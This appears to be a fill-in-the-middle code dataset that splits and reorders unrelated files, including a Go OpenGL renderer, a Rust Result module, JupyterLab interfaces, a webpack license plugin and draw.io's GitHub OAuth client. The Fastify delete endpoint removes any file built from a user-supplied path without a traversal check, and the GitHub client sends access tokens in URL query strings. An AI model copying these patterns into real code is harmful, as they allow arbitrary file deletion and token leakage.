l := new(Lines)
l.shader = shader
l.nvertex = len(data) / (shader.VertexFormat().Size() / 4)
gl.GenVertexArrays(1, &l.vao)
gl.GenBuffers(1, &l.vbo)
gl.BindVertexArray(l.vao)
gl.BindBuffer(gl.ARRAY_BUFFER, l.vbo)
gl.BufferData(gl.ARRAY_BUFFER, len(data)*4, gl.Ptr(data), gl.STATIC_DRAW)
offset := 0
for _, attr := range shader.VertexFormat() {
loc := gl.GetAttribLocation(shader.ID(), gl.Str(attr.Name+"\x00"))
var size int32
switch attr.Type {
case glhf.Float:
size = 1
case glhf.Vec2:
size = 2
case glhf.Vec3:
size = 3
case glhf.Vec4:
size = 4
}
gl.VertexAttribPointer(
uint32(loc),
size,
gl.FLOAT,
false,
int32(shader.VertexFormat().Size()),
gl.PtrOffset(offset),
)
gl.EnableVertexAttribArray(uint32(loc))
offset += attr.Type.Size()
}
gl.BindVertexArray(0)
gl.BindBuffer(gl.ARRAY_BUFFER, 0)
return l
} |
delete-file.ts | import { FastifyInstance, FastifySchema } from 'fastify';
import fs from 'fs';
import path from 'path';
import { getBasePathForDomain } from '../../core/config';
export default async function (app: FastifyInstance) : Promise<void> {
app.delete('/api/:domain/*', { | tags: ['mock'],
summary: "You can use this endpoint to cleanup files at the end of a test run, etc.",
security: [{ BearerAuth: [] }],
params: {
domain: { type: "string", description: "just a way to categorize the data really" },
"*": { type: "string", description: "relative path into the mock repository" }
}
}
}, async (req, reply) => {
const r: any = req.params;
const fullPath = path.join(getBasePathForDomain(r.domain), r["*"]);
fs.unlinkSync(fullPath);
return { "result": "success" };
});
} | schema: <FastifySchema>{
description: "delete file from the mock repository", |
result.rs | // Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! A type representing either success or failure
#[allow(missing_doc)];
use clone::Clone;
use cmp::Eq;
use either;
use iter::Iterator;
use option::{None, Option, Some, OptionIterator};
use vec;
use vec::OwnedVector;
use to_str::ToStr;
use str::StrSlice;
/// `Result` is a type that represents either success (`Ok`) or failure (`Err`).
///
/// In order to provide informative error messages, `E` is required to implement `ToStr`.
/// It is further recommended for `E` to be a descriptive error type, eg a `enum` for
/// all possible errors cases.
#[deriving(Clone, Eq)]
pub enum Result<T, E> {
/// Contains the successful result value
Ok(T),
/// Contains the error value
Err(E)
}
impl<T, E: ToStr> Result<T, E> {
/// Convert to the `either` type
///
/// `Ok` result variants are converted to `either::Right` variants, `Err`
/// result variants are converted to `either::Left`.
#[inline]
pub fn to_either(self)-> either::Either<E, T>{
match self {
Ok(t) => either::Right(t),
Err(e) => either::Left(e),
}
}
/// Get a reference to the value out of a successful result
///
/// # Failure
///
/// If the result is an error
#[inline]
pub fn get_ref<'a>(&'a self) -> &'a T {
match *self {
Ok(ref t) => t,
Err(ref e) => fail!("called `Result::get_ref()` on `Err` value: %s", e.to_str()),
}
}
/// Returns true if the result is `Ok`
#[inline]
pub fn is_ok(&self) -> bool {
match *self {
Ok(_) => true,
Err(_) => false
}
}
/// Returns true if the result is `Err`
#[inline]
pub fn is_err(&self) -> bool {
!self.is_ok()
}
/// Call a method based on a previous result
///
/// If `self` is `Ok` then the value is extracted and passed to `op`
/// whereupon `op`s result is returned. if `self` is `Err` then it is
/// immediately returned. This function can be used to compose the results
/// of two functions.
///
/// Example:
///
/// for buf in read_file(file) {
/// print_buf(buf)
/// }
#[inline]
pub fn iter<'r>(&'r self) -> OptionIterator<&'r T> {
match *self {
Ok(ref t) => Some(t),
Err(*) => None,
}.move_iter()
}
/// Call a method based on a previous result
///
/// If `self` is `Err` then the value is extracted and passed to `op`
/// whereupon `op`s result is returned. if `self` is `Ok` then it is
/// immediately returned. This function can be used to pass through a
/// successful result while handling an error.
#[inline]
pub fn iter_err<'r>(&'r self) -> OptionIterator<&'r E> {
match *self {
Ok(*) => None,
Err(ref t) => Some(t),
}.move_iter()
}
/// Unwraps a result, yielding the content of an `Ok`.
/// Fails if the value is a `Err` with an error message derived
/// from `E`'s `ToStr` implementation.
#[inline]
pub fn unwrap(self) -> T {
match self {
Ok(t) => t,
Err(e) => fail!("called `Result::unwrap()` on `Err` value: %s", e.to_str()),
}
}
/// Unwraps a result, yielding the content of an `Err`.
/// Fails if the value is a `Ok`.
#[inline]
pub fn unwrap_err(self) -> E {
self.expect_err("called `Result::unwrap_err()` on `Ok` value")
}
/// Unwraps a result, yielding the content of an `Ok`.
/// Fails if the value is a `Err` with a custom failure message.
#[inline]
pub fn expect(self, reason: &str) -> T {
match self {
Ok(t) => t,
Err(_) => fail!(reason.to_owned()),
}
}
/// Unwraps a result, yielding the content of an `Err`
/// Fails if the value is a `Ok` with a custom failure message.
#[inline]
pub fn expect_err(self, reason: &str) -> E {
match self {
Err(e) => e,
Ok(_) => fail!(reason.to_owned()),
}
}
/// Call a method based on a previous result
///
/// If `self` is `Ok` then the value is extracted and passed to `op`
/// whereupon `op`s result is wrapped in `Ok` and returned. if `self` is
/// `Err` then it is immediately returned. This function can be used to
/// compose the results of two functions.
///
/// Example:
///
/// let res = do read_file(file).map_move |buf| {
/// parse_bytes(buf)
/// }
#[inline]
pub fn | <U>(self, op: &fn(T) -> U) -> Result<U,E> {
match self {
Ok(t) => Ok(op(t)),
Err(e) => Err(e)
}
}
/// Call a method based on a previous result
///
/// If `self` is `Err` then the value is extracted and passed to `op`
/// whereupon `op`s result is wrapped in an `Err` and returned. if `self` is
/// `Ok` then it is immediately returned. This function can be used to pass
/// through a successful result while handling an error.
#[inline]
pub fn map_err_move<F>(self, op: &fn(E) -> F) -> Result<T,F> {
match self {
Ok(t) => Ok(t),
Err(e) => Err(op(e))
}
}
/// Call a method based on a previous result
///
/// If `self` is `Ok` then the value is extracted and passed to `op`
/// whereupon `op`s result is returned. if `self` is `Err` then it is
/// immediately returned. This function can be used to compose the results
/// of two functions.
///
/// Example:
///
/// let res = do read_file(file) |buf| {
/// Ok(parse_bytes(buf))
/// };
#[inline]
pub fn chain<U>(self, op: &fn(T) -> Result<U, E>) -> Result<U, E> {
match self {
Ok(t) => op(t),
Err(e) => Err(e),
}
}
/// Call a function based on a previous result
///
/// If `self` is `Err` then the value is extracted and passed to `op`
/// whereupon `op`s result is returned. if `self` is `Ok` then it is
/// immediately returned. This function can be used to pass through a
/// successful result while handling an error.
#[inline]
pub fn chain_err<F>(self, op: &fn(E) -> Result<T, F>) -> Result<T, F> {
match self {
Ok(t) => Ok(t),
Err(e) => op(e),
}
}
}
impl<T: Clone, E: ToStr> Result<T, E> {
/// Call a method based on a previous result
///
/// If `self` is `Err` then the value is extracted and passed to `op`
/// whereupon `op`s result is wrapped in an `Err` and returned. if `self` is
/// `Ok` then it is immediately returned. This function can be used to pass
/// through a successful result while handling an error.
#[inline]
pub fn map_err<F: Clone>(&self, op: &fn(&E) -> F) -> Result<T,F> {
match *self {
Ok(ref t) => Ok(t.clone()),
Err(ref e) => Err(op(e))
}
}
}
impl<T, E: Clone + ToStr> Result<T, E> {
/// Call a method based on a previous result
///
/// If `self` is `Ok` then the value is extracted and passed to `op`
/// whereupon `op`s result is wrapped in `Ok` and returned. if `self` is
/// `Err` then it is immediately returned. This function can be used to
/// compose the results of two functions.
///
/// Example:
///
/// let res = do read_file(file).map |buf| {
/// parse_bytes(buf)
/// };
#[inline]
pub fn map<U>(&self, op: &fn(&T) -> U) -> Result<U,E> {
match *self {
Ok(ref t) => Ok(op(t)),
Err(ref e) => Err(e.clone())
}
}
}
#[inline]
#[allow(missing_doc)]
pub fn map_opt<T, U: ToStr, V>(o_t: &Option<T>,
op: &fn(&T) -> Result<V,U>) -> Result<Option<V>,U> {
match *o_t {
None => Ok(None),
Some(ref t) => match op(t) {
Ok(v) => Ok(Some(v)),
Err(e) => Err(e)
}
}
}
/// Takes each element in the iterator: if it is an error, no further
/// elements are taken, and the error is returned.
/// Should no error occur, a vector containing the values of each Result
/// is returned.
///
/// Here is an example which increments every integer in a vector,
/// checking for overflow:
///
/// fn inc_conditionally(x: uint) -> Result<uint, &'static str> {
/// if x == uint::max_value { return Err("overflow"); }
/// else { return Ok(x+1u); }
/// }
/// let v = [1u, 2, 3];
/// let res = collect(v.iter().map(|&x| inc_conditionally(x)));
/// assert!(res == Ok(~[2u, 3, 4]));
#[inline]
pub fn collect<T, E, Iter: Iterator<Result<T, E>>>(mut iterator: Iter)
-> Result<~[T], E> {
let (lower, _) = iterator.size_hint();
let mut vs: ~[T] = vec::with_capacity(lower);
for t in iterator {
match t {
Ok(v) => vs.push(v),
Err(u) => return Err(u)
}
}
Ok(vs)
}
/// Perform a fold operation over the result values from an iterator.
///
/// If an `Err` is encountered, it is immediately returned.
/// Otherwise, the folded value is returned.
#[inline]
pub fn fold<T, V, E,
Iter: Iterator<Result<T, E>>>(
mut iterator: Iter,
mut init: V,
f: &fn(V, T) -> V)
-> Result<V, E> {
for t in iterator {
match t {
Ok(v) => init = f(init, v),
Err(u) => return Err(u)
}
}
Ok(init)
}
/// Perform a trivial fold operation over the result values
/// from an iterator.
///
/// If an `Err` is encountered, it is immediately returned.
/// Otherwise, a simple `Ok(())` is returned.
#[inline]
pub fn fold_<T, E, Iter: Iterator<Result<T, E>>>(
iterator: Iter)
-> Result<(), E> {
fold(iterator, (), |_, _| ())
}
#[cfg(test)]
mod tests {
use super::*;
use either;
use iter::range;
use str::OwnedStr;
use vec::ImmutableVector;
pub fn op1() -> Result<int, ~str> { Ok(666) }
pub fn op2(i: int) -> Result<uint, ~str> {
Ok(i as uint + 1u)
}
pub fn op3() -> Result<int, ~str> { Err(~"sadface") }
#[test]
pub fn chain_success() {
assert_eq!(op1().chain(op2).unwrap(), 667u);
}
#[test]
pub fn chain_failure() {
assert_eq!(op3().chain( op2).unwrap_err(), ~"sadface");
}
#[test]
pub fn test_impl_iter() {
let mut valid = false;
let okval = Ok::<~str, ~str>(~"a");
do okval.iter().next().map |_| { valid = true; };
assert!(valid);
let errval = Err::<~str, ~str>(~"b");
do errval.iter().next().map |_| { valid = false; };
assert!(valid);
}
#[test]
pub fn test_impl_iter_err() {
let mut valid = true;
let okval = Ok::<~str, ~str>(~"a");
do okval.iter_err().next().map |_| { valid = false };
assert!(valid);
valid = false;
let errval = Err::<~str, ~str>(~"b");
do errval.iter_err().next().map |_| { valid = true };
assert!(valid);
}
#[test]
pub fn test_impl_map() {
assert_eq!(Ok::<~str, ~str>(~"a").map(|x| (~"b").append(*x)), Ok(~"ba"));
assert_eq!(Err::<~str, ~str>(~"a").map(|x| (~"b").append(*x)), Err(~"a"));
}
#[test]
pub fn test_impl_map_err() {
assert_eq!(Ok::<~str, ~str>(~"a").map_err(|x| (~"b").append(*x)), Ok(~"a"));
assert_eq!(Err::<~str, ~str>(~"a").map_err(|x| (~"b").append(*x)), Err(~"ba"));
}
#[test]
pub fn test_impl_map_move() {
assert_eq!(Ok::<~str, ~str>(~"a").map_move(|x| x + "b"), Ok(~"ab"));
assert_eq!(Err::<~str, ~str>(~"a").map_move(|x| x + "b"), Err(~"a"));
}
#[test]
pub fn test_impl_map_err_move() {
assert_eq!(Ok::<~str, ~str>(~"a").map_err_move(|x| x + "b"), Ok(~"a"));
assert_eq!(Err::<~str, ~str>(~"a").map_err_move(|x| x + "b"), Err(~"ab"));
}
#[test]
pub fn test_get_ref_method() {
let foo: Result<int, ()> = Ok(100);
assert_eq!(*foo.get_ref(), 100);
}
#[test]
pub fn test_to_either() {
let r: Result<int, ()> = Ok(100);
let err: Result<(), int> = Err(404);
assert_eq!(r.to_either(), either::Right(100));
assert_eq!(err.to_either(), either::Left(404));
}
#[test]
fn test_collect() {
assert_eq!(collect(range(0, 0)
.map(|_| Ok::<int, ()>(0))),
Ok(~[]));
assert_eq!(collect(range(0, 3)
.map(|x| Ok::<int, ()>(x))),
Ok(~[0, 1, 2]));
assert_eq!(collect(range(0, 3)
.map(|x| if x > 1 { Err(x) } else { Ok(x) })),
Err(2));
// test that it does not take more elements than it needs
let functions = [|| Ok(()), || Err(1), || fail!()];
assert_eq!(collect(functions.iter().map(|f| (*f)())),
Err(1));
}
#[test]
fn test_fold() {
assert_eq!(fold_(range(0, 0)
.map(|_| Ok::<(), ()>(()))),
Ok(()));
assert_eq!(fold(range(0, 3)
.map(|x| Ok::<int, ()>(x)),
0, |a, b| a + b),
Ok(3));
assert_eq!(fold_(range(0, 3)
.map(|x| if x > 1 { Err(x) } else { Ok(()) })),
Err(2));
// test that it does not take more elements than it needs
let functions = [|| Ok(()), || Err(1), || fail!()];
assert_eq!(fold_(functions.iter()
.map(|f| (*f)())),
Err(1));
}
}
| map_move |
room.service.ts | /* eslint-disable prettier/prettier */
/* eslint-disable @typescript-eslint/no-unused-vars */
/* eslint-disable prettier/prettier */
import { Injectable } from '@nestjs/common';
import { InjectRepository } from '@nestjs/typeorm';
import {
IPaginationOptions,
paginate,
Pagination,
} from 'nestjs-typeorm-paginate';
import { MessageI } from 'src/message/message.interface';
import { MessageService } from 'src/message/message.service';
import { RoomEntity } from 'src/room/room.entity';
import { RoomI } from 'src/room/room.interface';
import { UserI } from 'src/user/model/user.interface';
import { Repository } from 'typeorm';
@Injectable()
export class RoomService {
constructor(
@InjectRepository(RoomEntity)
private readonly roomRepository: Repository<RoomEntity>,
private messageService: MessageService |
async createRoom(room: RoomI): Promise<RoomI> {
const newRoom = await this.addCreatorToRoom(room);
return this.roomRepository.save(newRoom);
}
async findAll(room: RoomI): Promise<RoomI[]> {
return this.roomRepository.find(room)
}
async addCreatorToRoom(room: RoomI): Promise<RoomI> {
return this.roomRepository.create(room)
}
} | ) {} |
editor.ts | import { JupyterFrontEndPlugin } from '@jupyterlab/application';
import { CodeEditor } from '@jupyterlab/codeeditor';
import { IDocumentWidget } from '@jupyterlab/docregistry';
import { Signal } from '@lumino/signaling';
import { WidgetAdapter } from '../adapters/adapter';
import { IEditorName } from '../feature';
import {
IEditorPosition,
IRootPosition,
ISourcePosition,
IVirtualPosition
} from '../positioning';
import {
ILSPVirtualEditorManager,
IVirtualEditorType,
PLUGIN_ID
} from '../tokens';
import { VirtualDocument } from './document';
import IEditor = CodeEditor.IEditor;
export interface IWindowCoordinates {
/**
* The number of pixels away from the left edge of the window.
*/
left: number;
/**
* The number of pixels away from the top edge of the window.
*/
top: number;
}
/**
* This is based on CodeMirror.EditorChange
*/
export interface IEditorChange {
/** Position (in the pre-change coordinate system) where the change started. */
from: ISourcePosition;
/** Position (in the pre-change coordinate system) where the change ended. */
to: ISourcePosition;
/** Array of strings representing the text that replaced the changed range (split by line). */
text: string[];
/** Text that used to be between from and to, which is overwritten by this change. */
removed?: string[];
/** String representing the origin of the change event and whether it can be merged with history */
origin?: string;
}
/**
* A virtual editor represents an abstraction of a single editor,
* even when it aggregates multiple underlying editors. It is not
* concerned with how the editors are presented (e.g. as cells or
* tiles) but should be able to pass on the responsibilities to the
* appropriate editor transparently, so that the features do not
* need to know about existence of multiple editors.
*/
export interface IVirtualEditor<T extends IEditor> {
/**
* The root (outermost, with no parent) virtual document
* representing the underlying document. While it is NOT
* being created by the virtual editor (but passed into
* the constructor), the instance stored there is the
* reference for all other objects.
*/
virtual_document: VirtualDocument;
/**
* A signal which will be emitted after each change in the
* value of any of the underlying editors
*/
change: Signal<IVirtualEditor<T>, IEditorChange>;
/**
* The editor name that will be used by feature-integration layer
* to identify this virtual editor.
*/
readonly editor_name: IEditorName;
/**
* Remove all handlers, signal connections and dispose any other objects
* created by the virtual editor.
*/
dispose(): void;
/**
* Get the innermost virtual document present at given root position.
*/
document_at_root_position(position: IRootPosition): VirtualDocument;
/**
* Transform a root position to a position relative to the innermost virtual document
* corresponding to the same character.
*/
root_position_to_virtual_position(position: IRootPosition): IVirtualPosition;
/**
* Retrieve a position the text cursor would have if it
* was placed at given window coordinates (screen pixels).
*/
window_coords_to_root_position(
coordinates: IWindowCoordinates
): IRootPosition;
/**
* Get the token at given root source position.
*/
get_token_at(position: IRootPosition): CodeEditor.IToken;
/**
* Get the position of the active text cursor in terms of the
* root position. If each editor has a separate cursor,
* the cursor of the active editor should be returned.
*/
get_cursor_position(): IRootPosition;
/**
* Transform the position within an editor to a root position.
*/
transform_from_editor_to_root(
ce_editor: T,
position: IEditorPosition
): IRootPosition | null;
/**
* Get the text from the model of the editor.
*/
get_editor_value(editor: T): string;
}
export namespace IVirtualEditor {
export interface IOptions {
adapter: WidgetAdapter<IDocumentWidget>;
virtual_document: VirtualDocument;
}
export type Constructor = {
new (options: IVirtualEditor.IOptions): IVirtualEditor<any>;
};
}
export class VirtualEditorManager implements ILSPVirtualEditorManager {
private readonly editorTypes: IVirtualEditorType<any>[];
constructor() {
this.editorTypes = [];
}
registerEditorType(options: IVirtualEditorType<CodeEditor.IEditor>) {
this.editorTypes.push(options);
}
findBestImplementation(
editors: CodeEditor.IEditor[]
): IVirtualEditorType<any> {
// for now, we check if all editors are of the same type,
// but it could be good enough if majority of the editors
// had the requested type
for (let editorType of this.editorTypes) {
if (editors.every(editor => editor instanceof editorType.supports)) {
return editorType;
}
}
console.warn(
'Cold not find a VirtualEditor suitable for the provided set of editors:',
editors
);
return null;
}
}
export const VIRTUAL_EDITOR_MANAGER: JupyterFrontEndPlugin<ILSPVirtualEditorManager> =
{
id: PLUGIN_ID + ':ILSPVirtualEditorManager',
requires: [],
activate: app => {
return new VirtualEditorManager();
}, | provides: ILSPVirtualEditorManager,
autoStart: true
}; |
|
index.js | import atpTree from "./reducer/tree";
| import TreeNode from "./container/tree-node";
const Tree = {
reducers: {
atpTree
}
};
export default Tree;
export {TreeNode, openAllTreeNodes, openTreeNode, closeAllTreeNodes, closeTreeNode}; | import {openAllTreeNodes, openTreeNode, closeAllTreeNodes, closeTreeNode} from "./reducer/tree";
|
index.js | /*eslint no-magic-numbers: ["error", { "ignore": [0,1,-1,2] }]*/
import {join, dirname} from 'path'
import getLicences from './get-licences'
import format from './format'
/**
* @param {Object} options options
* @param {boolean} options.devDependencies if devDependencies should be processed
* @param {Array|RegExp} options.exclude modules to exclude
* @param {string} options.directory working directory
*/
export default class | {
constructor(options = {}) {
this.options = options
this.exclude = options.exclude && [].concat(options.exclude)
this.excludeUserRequest = options.excludeUserRequest && [].concat(options.excludeUserRequest)
this.forceAddPackages = options.forceAddPackages || []
this.customLicenses = options.customLicenses || []
}
// TODO Exclude ProvidePlugin requests and aliases
// See compiler.options.plugins["0"].definitions
filterReasons(reason) {
return (
typeof reason.userRequest === 'string' &&
reason.userRequest.match(/^[^!.\/$][^!?=]*$/) &&
(!this.excludeUserRequest || !this.excludeUserRequest.some(it => it.test(reason.userRequest)))
)
}
filterModules(module) {
const modulePath = module.identifier || module.name
return (
(module.built || module.name.indexOf('external ') === 0) &&
module.name.indexOf('(webpack)') === -1 &&
module.reasons.length > 0 &&
(!this.exclude || !this.exclude.some(it => it.test(modulePath)))
)
}
apply(compiler) {
const directory = this.options.directory || process.cwd()
const additionalModules = this.options.modules || []
const filename = this.options.filename || 'third-party-libs.xml'
const pkg = require(join(directory, 'package.json'))
const title = this.options.title || `${pkg.description} Front-End Libraries`
const production = !this.options.devDependencies
const formatModules = this.options.format || format
const filterModules = this.filterModules.bind(this)
const filterReasons = this.filterReasons.bind(this)
const forceAddPackages = this.forceAddPackages
const customLicenses = this.customLicenses
const surviveLicenseErrors = this.options.surviveLicenseErrors
const ignoreTeamcity = Boolean(this.options.ignoreTeamcity)
const teamcityMessageStatus = this.options.teamcityMessageStatus
const emit = (curCompiler, callback) => {
// FS aliases from webpack.
const mkdir = compiler.outputFileSystem.mkdir
const writeFile = compiler.outputFileSystem.writeFile
const stats = curCompiler.getStats().toJson({
assets: false,
chunks: false,
source: false
})
const processModules = modules =>
modules.filter(filterModules).reduce(
(collected, module) =>
(module.modules ? collected.concat(processModules(module.modules)) : collected).concat(
module.reasons.filter(filterReasons).map(
reason =>
(reason.userRequest[0] === '@'
? reason.userRequest.
split('/').
splice(0, 2).
join('/')
: reason.userRequest.split('/')[0]),
),
),
[],
)
const foundModules = processModules(stats.modules).concat(additionalModules)
const modules = foundModules.concat(forceAddPackages)
const uniqueModules = [...new Set(modules)]
getLicences(
uniqueModules,
{directory, production, surviveLicenseErrors, ignoreTeamcity, teamcityMessageStatus},
(getLicencesError, _modules) => {
if (getLicencesError) {
return callback(getLicencesError)
}
const allModules = _modules.concat(customLicenses)
const filePath = join(compiler.options.output.path, filename)
mkdir(dirname(filePath), {recursive: true}, mkdirError => {
if (mkdirError && mkdirError.code !== 'EEXIST') {
return callback(mkdirError);
}
writeFile(
filePath,
formatModules({title, modules: allModules}),
{flags: 'w+'},
callback,
)
return undefined
})
return undefined
},
)
}
if (compiler.hooks) {
compiler.hooks.emit.tapAsync('RingUiLicenseCheckerPlugin', emit)
} else {
compiler.plugin('emit', emit)
}
}
}
| LicenseChecker |
GitHubClient.js | /**
* Copyright (c) 2006-2017, JGraph Ltd
* Copyright (c) 2006-2017, Gaudenz Alder
*/
GitHubClient = function(editorUi, authName)
{
DrawioClient.call(this, editorUi, authName || 'ghauth');
};
// Extends DrawioClient
mxUtils.extend(GitHubClient, DrawioClient);
/**
* Specifies if thumbnails should be enabled. Default is true.
* LATER: If thumbnails are disabled, make sure to replace the
* existing thumbnail with the placeholder only once.
*/
GitHubClient.prototype.clientId = (window.location.hostname == 'test.draw.io') ? '23bc97120b9035515661' : '89c9e4624ca416554489';
/**
* OAuth scope.
*/
GitHubClient.prototype.scope = 'repo';
/**
* Default extension for new files.
*/
GitHubClient.prototype.extension = '.drawio';
/**
* Base URL for API calls.
*/
GitHubClient.prototype.baseUrl = 'https://api.github.com';
/**
* Maximum file size of the GitHub REST API.
*/
GitHubClient.prototype.maxFileSize = 1000000 /*1MB*/;
/**
* Authorizes the client, gets the userId and calls <open>.
*/
GitHubClient.prototype.updateUser = function(success, error, failOnAuth)
{
var acceptResponse = true;
var timeoutThread = window.setTimeout(mxUtils.bind(this, function()
{
acceptResponse = false;
error({code: App.ERROR_TIMEOUT, message: mxResources.get('timeout')});
}), this.ui.timeout);
mxUtils.get(this.baseUrl + '/user?access_token=' + this.token, mxUtils.bind(this, function(userReq)
{
window.clearTimeout(timeoutThread);
if (acceptResponse)
{
if (userReq.getStatus() === 401)
{
if (!failOnAuth)
{
this.logout();
this.authenticate(mxUtils.bind(this, function()
{
this.updateUser(success, error, true);
}), error);
}
else
{
error({message: mxResources.get('accessDenied')});
}
}
else if (userReq.getStatus() < 200 || userReq.getStatus() >= 300)
{
error({message: mxResources.get('accessDenied')});
}
else
{
this.setUser(this.createUser(JSON.parse(userReq.getText())));
success();
}
}
}));
};
/**
* Authorizes the client, gets the userId and calls <open>.
*/
GitHubClient.prototype.createUser = function(userInfo)
{
return new DrawioUser(userInfo.id, userInfo.email, userInfo.name);
};
/**
* Authorizes the client, gets the userId and calls <open>.
*/
GitHubClient.prototype.authenticate = function(success, error)
{
if (window.onGitHubCallback == null)
{
var auth = mxUtils.bind(this, function()
{
var acceptAuthResponse = true;
this.ui.showAuthDialog(this, true, mxUtils.bind(this, function(remember, authSuccess)
{
var win = window.open('https://github.com/login/oauth/authorize?client_id=' +
this.clientId + '&scope=' + this.scope, 'ghauth');
if (win != null)
{
window.onGitHubCallback = mxUtils.bind(this, function(code, authWindow)
{
if (acceptAuthResponse)
{
window.onGitHubCallback = null;
acceptAuthResponse = false;
if (code == null)
{
error({message: mxResources.get('accessDenied'), retry: auth});
}
else
{
// Gets token for code via servlet
var fn = mxUtils.bind(this, function()
{
var acceptResponse = true;
var timeoutThread = window.setTimeout(mxUtils.bind(this, function()
{
acceptResponse = false;
error({code: App.ERROR_TIMEOUT, retry: fn});
}), this.ui.timeout);
mxUtils.get('/github?client_id=' + this.clientId + '&code=' + code, mxUtils.bind(this, function(authReq)
{
window.clearTimeout(timeoutThread);
if (acceptResponse)
{
try
{
if (authReq.getStatus() < 200 || authReq.getStatus() >= 300)
{
error({message: mxResources.get('cannotLogin')});
}
else
{
if (authSuccess != null)
{
authSuccess();
}
var res = authReq.getText();
this.token = res.substring(res.indexOf('=') + 1, res.indexOf('&'));
this.setUser(null);
if (remember)
{
this.setPersistentToken(this.token);
}
success();
}
}
catch (e)
{
error(e);
}
finally
{
if (authWindow != null)
{
authWindow.close();
}
}
}
}));
});
fn();
}
}
else if (authWindow != null)
{
authWindow.close();
}
});
}
else
{
error({message: mxResources.get('serviceUnavailableOrBlocked'), retry: auth});
}
}), mxUtils.bind(this, function()
{
if (acceptAuthResponse)
{
window.onGitHubCallback = null;
acceptAuthResponse = false;
error({message: mxResources.get('accessDenied'), retry: auth});
}
}));
});
auth();
}
else
{
error({code: App.ERROR_BUSY});
}
};
/**
* Authorizes the client, gets the userId and calls <open>.
*/
GitHubClient.prototype.getErrorMessage = function(req, defaultText)
{
try
{
var temp = JSON.parse(req.getText());
if (temp != null && temp.message != null)
{
defaultText = temp.message;
}
}
catch (e)
{
// ignore
}
return defaultText;
};
/**
* Authorizes the client, gets the userId and calls <open>.
*/
GitHubClient.prototype.executeRequest = function(req, success, error, ignoreNotFound)
{
var doExecute = mxUtils.bind(this, function(failOnAuth)
{
var acceptResponse = true;
var timeoutThread = window.setTimeout(mxUtils.bind(this, function()
{
acceptResponse = false;
error({code: App.ERROR_TIMEOUT, retry: fn});
}), this.ui.timeout);
var temp = this.token;
req.setRequestHeaders = function(request, params)
{
request.setRequestHeader('Authorization', 'token ' + temp);
};
req.send(mxUtils.bind(this, function()
{
window.clearTimeout(timeoutThread);
if (acceptResponse)
{
if ((req.getStatus() >= 200 && req.getStatus() <= 299) ||
(ignoreNotFound && req.getStatus() == 404))
{
success(req);
}
else if (req.getStatus() === 401)
{
if (!failOnAuth)
{
this.authenticate(function()
{
doExecute(true);
}, error);
}
else
{
error({code: req.getStatus(), message: mxResources.get('accessDenied'), retry: mxUtils.bind(this, function()
{
this.authenticate(function()
{
fn(true);
}, error);
})});
}
}
else if (req.getStatus() === 403)
{
var tooLarge = false;
try
{
var temp = JSON.parse(req.getText());
if (temp != null && temp.errors != null && temp.errors.length > 0)
{
tooLarge = temp.errors[0].code == 'too_large';
}
}
catch (e)
{
// ignore
}
error({message: mxResources.get((tooLarge) ? 'drawingTooLarge' : 'forbidden')});
}
else if (req.getStatus() === 404)
{
error({code: req.getStatus(), message: this.getErrorMessage(req, mxResources.get('fileNotFound'))});
}
else if (req.getStatus() === 409)
{
// Special case: flag to the caller that there was a conflict
error({code: req.getStatus(), status: 409});
}
else
{
error({code: req.getStatus(), message: this.getErrorMessage(req, mxResources.get('error') + ' ' + req.getStatus())});
}
}
}), error);
});
var fn = mxUtils.bind(this, function(failOnAuth)
{
if (this.user == null)
{
this.updateUser(function()
{
fn(true);
}, error, failOnAuth);
}
else
{
doExecute(failOnAuth);
}
});
if (this.token == null)
{
this.authenticate(function()
{
fn(true);
}, error);
}
else
{
fn(false);
}
};
/**
* Checks if the client is authorized and calls the next step.
*/
GitHubClient.prototype.getLibrary = function(path, success, error)
{
this.getFile(path, success, error, true);
};
/**
* Checks if the client is authorized and calls the next step.
*/
GitHubClient.prototype.getSha = function(org, repo, path, ref, success, error)
{
// Adds random parameter to bypass cache
var rnd = '&t=' + new Date().getTime();
var req = new mxXmlRequest(this.baseUrl + '/repos/' + org + '/' + repo +
'/contents/' + path + '?ref=' + ref + rnd, null, 'HEAD');
this.executeRequest(req, mxUtils.bind(this, function(req)
{
try
{
success(req.request.getResponseHeader('Etag').match(/"([^"]+)"/)[1]);
}
catch (e)
{
error(e);
}
}), error);
};
/**
* Checks if the client is authorized and calls the next step.
*/
GitHubClient.prototype.getFile = function(path, success, error, asLibrary, checkExists)
{
asLibrary = (asLibrary != null) ? asLibrary : false;
var tokens = path.split('/');
var org = tokens[0];
var repo = tokens[1];
var ref = tokens[2];
path = tokens.slice(3, tokens.length).join('/');
var binary = /\.png$/i.test(path);
// Handles .vsdx, Gliffy and PNG+XML files by creating a temporary file
if (!checkExists && (/\.v(dx|sdx?)$/i.test(path) || /\.gliffy$/i.test(path) ||
/\.pdf$/i.test(path) || (!this.ui.useCanvasForExport && binary)))
{
// Should never be null
if (this.token != null)
{
var url = this.baseUrl + '/repos/' + org + '/' + repo + '/contents/' +
path + '?ref=' + ref + '&token=' + this.token;
tokens = path.split('/');
var name = (tokens.length > 0) ? tokens[tokens.length - 1] : path;
this.ui.convertFile(url, name, null, this.extension, success, error);
}
else
{
error({message: mxResources.get('accessDenied')});
}
}
else
{
// Adds random parameter to bypass cache
var rnd = '&t=' + new Date().getTime();
var req = new mxXmlRequest(this.baseUrl + '/repos/' + org + '/' + repo +
'/contents/' + path + '?ref=' + ref + rnd, null, 'GET');
this.executeRequest(req, mxUtils.bind(this, function(req)
{
try
{
success(this.createGitHubFile(org, repo, ref, JSON.parse(req.getText()), asLibrary));
}
catch (e)
{
error(e);
}
}), error);
}
};
/**
* Translates this point by the given vector.
*
* @param {number} dx X-coordinate of the translation.
* @param {number} dy Y-coordinate of the translation.
*/
GitHubClient.prototype.createGitHubFile = function(org, repo, ref, data, asLibrary)
{
var meta = {'org': org, 'repo': repo, 'ref': ref, 'name': data.name,
'path': data.path, 'sha': data.sha, 'html_url': data.html_url,
'download_url': data.download_url};
var content = data.content;
if (data.encoding === 'base64')
{
if (/\.jpe?g$/i.test(data.name))
{
content = 'data:image/jpeg;base64,' + content;
}
else if (/\.gif$/i.test(data.name))
{
content = 'data:image/gif;base64,' + content;
}
else
{
if (/\.png$/i.test(data.name))
{
var xml = this.ui.extractGraphModelFromPng(content);
